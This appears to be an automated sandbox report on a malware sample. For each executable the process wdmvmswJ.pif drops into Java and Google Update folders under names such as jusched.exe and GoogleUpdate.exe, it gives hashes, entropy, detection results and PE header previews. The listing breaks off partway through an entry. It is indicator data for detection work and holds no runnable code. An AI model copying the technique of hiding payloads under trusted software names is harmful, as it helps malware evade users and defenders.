                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:E270AE516A40989DA2942FC5476DC07D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:0047B403BF06CBCA266A8AE2874B853F6836B9ED
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:87ED19B24E014CCF7AC5B7E5535F39A4278AE104F50CC2E95C494B481027F09E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:AD2431B487E2E266E4F413366383DCAEEDC6F4DBB87ADE356C53CF577A4C16668DA747C8920F3F4A1F3D4F662BAF65A62BD7FC775C4F8BE0A1732C1772192489
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@.........................................................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1644544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.694825890303236
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:i0vHyeLj8trn3ws0sqjnhMgeiCl7G0nehbGZpbD:ztj4rgsQDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AED406C1954CE12EAD0AA3653D2DFB6E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:492534461541F8C7BA888211424328877532E590
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:787AAAD3121E1F5023CC1D56312FF29B6B94D2A7C7E7432FBBB7CDADE52EBA05
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:5D443E0280E123AEDF26DB61B049227B52F1CFE16CF8D7473823E9C1E610E927A9F2E8574EC49688A698665881011A85231B351DECFD5CD4E5FBC439BDE61201
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g=H(#\&{#\&{#\&{77%z2\&{77#z.\&{A$.{"\&{A$"z1\&{A$%z5\&{A$#zu\&{77"z;\&{77 z"\&{77'z4\&{#\'{.\&{.%"z$\&{.%#z.\&{.%.{"\&{#\.{!\&{.%$z"\&{Rich#\&{........PE..L.....d............................7........0....@..........................`..............................................<........P...|..........................0m..............................pl..@............0..t............................text...?........................... ..`.rdata.......0......................@..@.data....3....... ..................@....rsrc....|...P...~..................@..@.reloc..............................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1781760
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.279696391988148
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:moMOW0n7Ubxk/uRv5qLGJLQ4a56duA/85RkV4l7/ZxsqjnhMgeiCl7G0nehbGZpv:T4i0wGJra0uAUfkVy7/ZFDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:F5F43CB26C12791BD541DD7F8582C75A
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4BC7E9F0AD6EA1FA06A4C47030FF896C16763D73
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7F3961A7389EC56A00D3CABAEE8148D0C07A57875433DF04669478333A31BCAD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C26FCA0A455B5F0D16660E2B5E1723F451645A1BFD3A341149D3D70235FA026CF6D45A0E7B314D89975A51002817E895A6D4B3FB5BFEA6680C4B01CD123DA147
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$...................................p.....l.......................................................<......<....<.n.............<......Rich............................PE..L.....d.................:...*...............P....@.................................6...........................................,.......................................................................@............P...............................text....8.......:.................. ..`.rdata.......P.......>..............@..@.data...PG...0...2..................@....rsrc................D..............@..@.reloc...p.......`..................@...................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1318400
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.448801860827976
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:6eR0gB6axoCf0R6RLQRF/TzJqe58BimmsqjnhMgeiCl7G0nehbGZpbD:WgHxmR6uBTzge5MimqDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:629824274CF25E61008FBA3626FE2F40
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E7C72AD1443D43625C3AB6AA3736324055FD7884
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:464F6C5A1C1B2D819913263593037E25E6A8DA3FA501C6D4F78E0DBF6235EC52
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:4BBE1FA6D4979AE1EC9B365B6C5CD150A452C7880D6CFD9F85E3B58069ED3498E86786882C6E1C63B7A1D54EA58AA48C6EC709E7F0265303C6CF56F1A90FA98B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........r.b.!.b.!.b.!... .b.!... xb.!..1!.b.!... .b.!... .b.!... .b.!... .b.!... .b.!... .b.!.b.!.c.!?.. .b.!?.. .b.!?.3!.b.!.b[!.b.!?.. .b.!Rich.b.!........PE..L.....d..........................................@..........................`..............................................t$.....................................`T...............................S..@............................................text...L........................... ..`.rdata..0Z.......\..................@..@.data...8<...@...(...&..............@....rsrc...............N..............@..@.reloc...P.......@..................@...................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4460825138159645
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:XnEbH0j4x7R6SvyCMkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:XkwOtO7ksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:582DC946FC5CB8C255D1189119A3BE34
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:50BEF2C348BCB8DFB9147F936C23F0BD47BAE639
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:EC15AF431256025E4647A03012AFC82D4C15C01B67C963100398B9E7EA4A6318
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C3A21647C0371D6C5BE07C37419855644004CA6D782D18DC100FEC51A4E27504F9026FFC351FC387E75C302C70C98DCFA226D9EC4FBF50F1F40F905DAA424BB5
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@......Z........................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1375232
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.446838912937845
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:GnU/h/4KXsqjnhMgeiCl7G0nehbGZpbD:GU/VrDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6E00DB5E93DFC5A8B2C4601491F8D8CA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:DE3D515709C6E10EA99FF470484B819085337820
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:84ABC5513249E75C07E99515F8752962F8108FC64BA3E3048265C180E2DEBB85
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A3A962B8ACBA7241FCA8A499B3F5BA0962924DD5AA193FF35FD1AD17FDC57E3F6B0D773C3E9E846CE8E5F722B772C9664CB724E8222BBCB9B86C31361B426ADA
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@..............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1513984
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.483762497249394
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:/x71iBLZ05jNTmJWExQsqjnhMgeiCl7G0nehbGZpbD:/xhiHIjNgMDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D29560F00A40B37A5ECEF689B06439AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E7B9DE2F20C1AA83794FC6DC78DBE5683060495D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:A9B67EBAEAC90E7A75EC8C8372B26D22455B7FDDFE5C6F417275A5205C776987
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:26C03E29733B3BE2039B2FFA0C46498747947D35D0D9536710AFB20D493AAEF79A574907EDDC69B42F8EDA9ED9504F82C96C4036DCC9408D8ABA6E97D3675F3D
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@.............................................................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1419264
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.4667377008834555
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ElnRklQ6fgJcEwix+sqjnhMgeiCl7G0nehbGZpbD:goRfgJcEwCSDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6D66B829F1B8E841A3A89282BFB2B37F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:CB6438CA63FA76B358E7E51222C0EBFDCA92E9C5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:2A967EDB732EC3201281EE8284BDE7ECFD577F2F488F1EE9A0BDB36DE2CC3168
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:7838EDACB75731611829FE19F6B485BB7B8F6C61867B7F076EDFE2B832AC3DF490764FF19ECBA7DAC063ACBE39686858BBF3869DF16531813F407ED75FFC6E80
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@.................................w~......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1522176
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.496556950892986
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:AW25k8hb0Haw+xOsqjnhMgeiCl7G0nehbGZpbD:AWyk8SHawmiDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:6967E6BF7B5B511ABD3AA4F79405A5B2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4DD758812C57C02E4EDA6DF929BCFA5B3C14D3BD
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:1BB603FECF0042BB3D36FA858E083277CB3825F18BF6DADFFE06A24C557E4280
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:055930E5FEB7711D77C95A2BDB9879148554163452BFDC977A7BE12D3FB872EB7FB0BBBC8A83E4BE3A43C830FA6EA05201EF917415950129C7F089F69C193F58
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................._.... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163957700428245
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:nWP/aK2vB+1Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:nKCKABWsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:8AC267010867746C9A420F01181F4217
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:C17D619CEE8B0DF875EA90A611B7BE1F5B69AACE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4C30067154C169B296228419F83B8484121D57232F1481F6357B4D9938C14DDA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:A6C2BC4A0D82ADA31CE8E99BB77629B3CD8F5B9C71A7A3079E6441578948BCC665920D8B72BA11E8A64009CAAA7749F5DEFBEDCCD23C55B327C23DA60BE8A83B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.................................>.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1228288
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.162047104041508
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:pO7cCNWB+09HXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:ojNWBPlsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:691E3341727CE7F7A488D2FD1E81F9EC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:723ED6090EA850B62EA37F7CB7C430DC205CD51F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:F21ABD67232583CB095544248041A4576EC993CC001F779D7A6E07B0B7796BC2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:0E9AD37809BF8A7CA95A0F921C935D2341B28422776769728D51B012355858CA66EC6E8960FC37613F567D08ACC6A0530E654677A207336BE1223E794EE9A797
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................u........................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1302528
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.238943048379839
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:qihRyhdsRrrsqjnhMgeiCl7G0nehbGZpbD:qihsoRfDmg27RnWGj
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:AE21B6B9DB13147E61708D60061FD4D4
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:7FA3AE8DF1211BE6ED7320C4F2EA8146191F5595
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:6F4C7B1EA926FD2F460990202EF8F53FD496159608FA2ED2C1B5D79AF627DCCA
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:503E57FE1EA2B6DEF5BE2C57CD3324DE4C09F631C8CCA4274951202245F47A9AE191B3129AEB6124997C71A5B057FC38FC0CCE33DB9EAEF79E33DCAB44252B33
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p.......S.... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

                                                                                                                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1342464
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.351029069546174
